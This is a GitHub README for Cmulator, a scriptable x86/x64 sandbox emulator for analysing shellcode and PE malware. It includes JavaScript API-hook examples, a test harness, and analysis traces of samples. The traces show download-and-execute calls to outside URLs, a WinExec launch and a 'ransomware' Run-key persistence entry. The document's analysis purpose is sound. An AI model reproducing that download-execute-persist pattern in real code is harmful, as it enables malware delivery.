Project author: Coldzer0

Project description:
Cmulator is an (x86 - x64) Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries. Based on Unicorn & Zydis Engine & JavaScript.
Language: Pascal
Repository: git://github.com/Coldzer0/Cmulator.git
Created: 2018-09-15T07:00:42Z
Project community: https://github.com/Coldzer0/Cmulator

License: GNU Affero General Public License v3.0


Cmulator - Scriptable x86 RE Sandbox Emulator (v0.3 Beta)

License: AGPL v3



Cmulator is an (x86 - x64) Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries.

Based on Unicorn & Capstone Engine & JavaScript.

💬 This is the last supported Pascal version; the new code base (C/C++) will be here: Cmulator.

Supported Architectures:

  • i386
  • x86-64

Supported File Formats

  • PE, PE+
  • shellcodes

Known problems

  • There's a bug in Unicorn modifying data near EIP.

    If anyone can help, please check unicorn#820.

Current Features

  • Simulated GDT & Segments.
  • Simulated TEB & PEB structures for both Shellcodes and PE.
  • Simulated LDR Table & Data.
  • Manages Image and Stack memory.
  • Evaluates functions based on DLL exports.
  • Trace all Executed API ( good for Obfuscated PE).
  • Displays HexDump with Strings based on referenced memory locations.
  • Patching the Memory.
  • Custom API hooks using Javascript (scripting).
  • Handle SEH (still need more work).
  • [+] Hook Address.
  • [+] Apiset map resolver



[+] Changelog

  • V0.3 Beta

  • v0.2 beta

    • [+] Add Hook Address
    • [+] Implementing Api schema forwarder
    • [+] Change disassembler from Capstone to Zydis Engine
    • [√] improvements for SEH handling
    • [√] improvements with JS to API handle
    • [√] Improve API detection by address or name or ordinal
  • v0.1 beta

    • Init version





Hook Example JavaScript

```javascript
var GetModuleFileName = new ApiHook();
/*
DWORD WINAPI GetModuleFileName(
  _In_opt_ HMODULE hModule,
  _Out_    LPTSTR  lpFilename,
  _In_     DWORD   nSize
);
*/
GetModuleFileName.OnCallBack = function (Emu, API, ret) {
  Emu.pop(); // return address
  // x64: args in RCX/RDX/R8; x86 stdcall: args on the stack, the callee cleans them up
  var hModule = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
  var lpFilename = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
  var nSize = Emu.isx64 ? Emu.ReadReg(REG_R8D) : Emu.pop();
  var mName = Emu.GetModuleName(hModule);
  var Path = 'C:\\pla\\' + mName;
  var len = API.IsWapi ? Emu.WriteStringW(lpFilename, Path) : Emu.WriteStringA(lpFilename, Path);
  // null terminator - maybe needed, maybe not :D - written anyway :V
  API.IsWapi ? Emu.WriteWord(lpFilename + (len * 2), 0) : Emu.WriteByte(lpFilename + len, 0);
  print("{0}(0x{1}, 0x{2}, 0x{3}) = '{4}'".format(
    API.name,
    hModule.toString(16),
    lpFilename.toString(16),
    nSize.toString(16),
    Path
  ));
  // MS Docs : the return value is the length of the string
  Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, len);
  Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);
  return true; // true if you handled it, false if you want Emu to handle it and set PC
};
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameA');
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameW');
```

```javascript
var _vsnprintf = new ApiHook();
/*
int _vsnprintf(
  char *buffer,
  size_t count,
  const char *format,
  va_list argptr
);
*/
_vsnprintf.OnCallBack = function (Emu, API, ret) {
  // save the param to args
  // args is an Array and it's implemented in every ApiHook
  // x64: first arg in RCX; x86 cdecl: first arg at [ESP+4], just above the return address
  _vsnprintf.args[0] = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.ReadDword(Emu.ReadReg(REG_ESP) + 4);
  // implementing this in JS is hard, so just let the library handle it :D
  return true; // true so we continue to the lib code
};
// OnExit callback, runs after the library code returns
_vsnprintf.OnExit = function (Emu, API) {
  // read our saved param
  var buffer = _vsnprintf.args[0];
  warn("OnExit : _vsnprintf() = '{0}' ".format(
    Emu.ReadStringA(buffer)
  ));
};
_vsnprintf.install('msvcrt.dll', '_vsnprintf');
```
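An added example (not code from the Cmulator project): a stub Emu exposing the same method names the hooks above rely on, plus a GetWindowsDirectoryA hook in the same OnCallBack style that also checks the caller's buffer size, so a hook can be unit-tested under Node before it is loaded into Cmulator. The FakeEmu class, the REG_* string constants and the fixed stack and buffer addresses are assumptions of this harness.

```javascript
// Added example, not Cmulator's own code: a tiny stand-in for the Emu object
// Cmulator passes to ApiHook callbacks (memory, stack, registers only), so a
// hook can be exercised offline. REG_* names here are placeholders.
const REG_RCX = 'rcx', REG_RDX = 'rdx', REG_RAX = 'rax', REG_EAX = 'eax',
      REG_RIP = 'rip', REG_EIP = 'eip';

class FakeEmu {
  constructor(isx64) {
    this.isx64 = isx64;
    this.mem = new DataView(new ArrayBuffer(0x10000)); // flat 64 KiB fake space
    this.regs = {}; this.sp = 0x8000;                   // regs + stack pointer
  }
  ReadReg(r) { return this.regs[r] || 0; }
  SetReg(r, v) { this.regs[r] = v; }
  ReadDword(a) { return this.mem.getUint32(a, true); }
  WriteDword(a, v) { this.mem.setUint32(a, v >>> 0, true); }
  WriteByte(a, b) { this.mem.setUint8(a, b & 0xff); }
  push(v) { this.sp -= this.isx64 ? 8 : 4; this.WriteDword(this.sp, v); }
  pop() { const v = this.ReadDword(this.sp); this.sp += this.isx64 ? 8 : 4; return v; }
  WriteStringA(a, s) { [...s].forEach((c, i) => this.WriteByte(a + i, c.charCodeAt(0))); return s.length; }
  ReadStringA(a) { let s = ''; for (let c; (c = this.mem.getUint8(a)); a++) s += String.fromCharCode(c); return s; }
}
// GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize) hook in the page's OnCallBack
// style, but honouring uSize: too-small buffer => copy nothing, return size needed.
function GetWindowsDirectoryA_OnCallBack(Emu, API, ret) {
  const WINDIR = 'C:\\Windows';
  Emu.pop();                                              // return address
  const lpBuffer = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
  const uSize = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
  let result = WINDIR.length + 1;                         // bytes needed incl. NUL
  if (uSize >= result) {
    result = Emu.WriteStringA(lpBuffer, WINDIR);          // chars copied
    Emu.WriteByte(lpBuffer + result, 0);                  // NUL terminator
  }
  Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, result);
  Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);         // resume after the call
  return true;                                            // handled by the hook
}

// Drive the hook as Cmulator would right after the emulated `call`: args in
// RCX/RDX on x64, pushed right-to-left on x86, return address pushed last.
function simulateCall(isx64, uSize) {
  const Emu = new FakeEmu(isx64), buf = 0x1000, ret = 0x401234;
  if (isx64) { Emu.SetReg(REG_RCX, buf); Emu.SetReg(REG_RDX, uSize); }
  else { Emu.push(uSize); Emu.push(buf); }
  Emu.push(ret);
  GetWindowsDirectoryA_OnCallBack(Emu, { name: 'GetWindowsDirectoryA' }, ret);
  return { rv: Emu.ReadReg(isx64 ? REG_RAX : REG_EAX), str: Emu.ReadStringA(buf),
           pc: Emu.ReadReg(isx64 ? REG_RIP : REG_EIP), sp: Emu.sp };
}
```

With a 260-byte buffer the harness reproduces the `GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows'` line from the example output below, and after the x86 call the stack pointer is back where it started, which is the stdcall cleanup the hook performs by popping its arguments.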



Example Output:

AntiDebug Downloader



```
Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 01:51:51
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"AntiDebugDownloader.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : AntiDebugDownloader.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers : 0000000000000400
[*] Size Of Image : 0000000000004000
[---------------------------------------]
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : AntiDebugDownloader.exe
[*] Import 3 Dlls
[+] Fix IAT for : kernel32.dll
[+] Fix IAT for : urlmon.dll
[+] Fix IAT for : advapi32.dll
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 52 Libraries ...
[>] Run AntiDebugDownloader.exe
0x401005 : IsDebuggerPresent = 0
GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows'
0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0)
0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144
0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260)
0x40107a : RegCloseKey()
ExitProcess(0x0)
26 Branches - Executed in 9 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ¯\_(ツ)_/¯
```


x64 Down & Exec ShellCode




```
Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"sc64.exe" is : x64
Mapping the File ..
[+] Unicorn Init done .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : sc64.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers : 0000000000000400
[*] Size Of Image : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : sc64.exe
[*] Import 0 Dlls
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 25 Libraries ...
[>] Run sc64.exe
LoadLibraryA('urlmon') = 0x70714000
GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10
0x40111b : URLDownloadToFileA(0, 'http://192.168.10.129/pl.exe', 'C:\\Users\\Public\\p.exe', 0, 2489880)
SetFileAttributesA('C:\\Users\\Public\\p.exe',0x2)
WinExec('C:\\Users\\Public\\p.exe', 0)
FatalExit(0x0)
95 Steps - Executed in 295 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ¯\_(ツ)_/¯
```


x32 Down & Exec ShellCode




```
Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"sc32.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : sc32.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers : 0000000000000400
[*] Size Of Image : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : sc32.exe
[*] Import 0 Dlls
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 25 Libraries ...
[>] Run sc32.exe
GetProcAddress(0x70300000,'LoadLibraryA') = 0x703149D7
LoadLibraryA('urlmon.dll') = 0x7065a000
GetProcAddress(0x7065A000,'URLDownloadToFileA') = 0x706F08D0
GetProcAddress(0x70300000,'WinExec') = 0x70392C21
0x40113b : URLDownloadToFileA(0, 'https://rstforums.com/fisiere/dead.exe', 'dead.exe', 0, 0)
WinExec('dead.exe', 1)
3041 Steps - Executed in 415 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ¯\_(ツ)_/¯
```


Show SEH handling (PELock Obfuscator)



```
Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe -ex
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"obfuscated.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : obfuscated.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers : 0000000000001000
[*] Size Of Image : 000000000000F000
[---------------------------------------]
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : obfuscated.exe
[*] Import 2 Dlls
[+] Fix IAT for : KERNEL32.dll
[+] Fix IAT for : USER32.dll
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 44 Libraries ...
[>] Run obfuscated.exe
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 1, data value = 0x0
0x403031 Exception caught SEH 0x25FEEC - Handler 0x409215
ZwContinue -> Context = 0x25F97C
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x4056EC Exception caught SEH 0x25FEE8 - Handler 0x402516
ZwContinue -> Context = 0x25F978
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x401974 Exception caught SEH 0x25FEE4 - Handler 0x4019CE
ZwContinue -> Context = 0x25F974
MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x403A49 Exception caught SEH 0x25FEF4 - Handler 0x40A17B
ZwContinue -> Context = 0x25F984
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x40AD64 Exception caught SEH 0x25FEF4 - Handler 0x40B461
ZwContinue -> Context = 0x25F984
ExitProcess(0x0)
7387 Steps - Executed in 118 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ¯\_(ツ)_/¯
```


Hide SEH handling (PELock Obfuscator)



```
Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe
Cmulator Malware Analyzer - By Coldzer0
Compiled on : 2018/09/29 - 03:07:11
Target CPU : i386 & x86_x64
Unicorn Engine : v1.0
Cmulator : v0.1
"obfuscated.exe" is : x32
Mapping the File ..
[+] Unicorn Init done .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn
[---------------- PE Info --------------]
[*] File Name : obfuscated.exe
[*] Image Base : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers : 0000000000001000
[*] Size Of Image : 000000000000F000
[---------------------------------------]
[---------------------------------------]
[ Fixing PE Imports ]
[*] File Name : obfuscated.exe
[*] Import 2 Dlls
[+] Fix IAT for : KERNEL32.dll
[+] Fix IAT for : USER32.dll
[---------------------------------------]
[+] Segments & (TIB - PEB) Init Done .
[+] Loading JS Main Script : ../API.JS
Initiating 44 Libraries ...
[>] Run obfuscated.exe
MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
ExitProcess(0x0)
7387 Steps - Executed in 116 ms
Cmulator Stop >> last Error : OK (UC_ERR_OK)
Press Enter to Close ¯\_(ツ)_/¯
```




Try it yourself: the sample is at "samples/obfuscated/obfuscated.exe" 😉



WIP BY Priority :

  • Memory Manager - Next version
  • Checking for bugs & fixing them 👌🏻
  • Api schema forwarder still needs more improvements and testing

TODO BY Priority :

  • PC (RIP - EIP) Hook.
  • improving exception handling.
  • Native Plugins & API Hook Libs.
  • Api schema forwarder.
  • Add Memory Manager.
  • Sysenter / Syscall Global Hook in JS.
  • Control TEB/PEB in JS.
  • Interactive debug shell.
  • Add Assembler.
  • Implement Threading.

Requirements

  • Freepascal >= v3
  • Unicorn Engine
  • Zydis Engine
  • QuickJS Engine

Installation

  • Install Lazarus IDE
  • You will find all needed libraries in “libraries” Folder ;)
  • Now Build

Build

1. Build Cmulator

  1. git clone https://github.com/Coldzer0/Cmulator.git
  2. Open "Cmulator.lpi" with Lazarus IDE
  3. Then hit Compile :D
  4. Oh, before that you need to select the Build Mode:
  5. From the Lazarus IDE select
  6. Projects -> Project Options -> Compiler Options
  7. and select the Mode for your OS.

Or Just Download From Releases



2. Create config.json config file

```
touch config.json
```

3. Set Win dlls Path

Set the dll folders to where you stored your Windows DLLs and the JS main file.

```json
{
  "system": {
    "win32": "../win_dlls/x32_win7",
    "win64": "../win_dlls/x64_win7",
    "Apiset": "../Apiset.json"
  },
  "JS": {
    "main": "../API.JS"
  }
}
```

Run

```
./Cmulator -file samples/AntiDebug.exe
```

Documentation

Still working on it; it will be available soon.


Acknowledgements & Resources:

This work was inspired by:

Used open source projects:

Resources used:

With ❤️ From Home.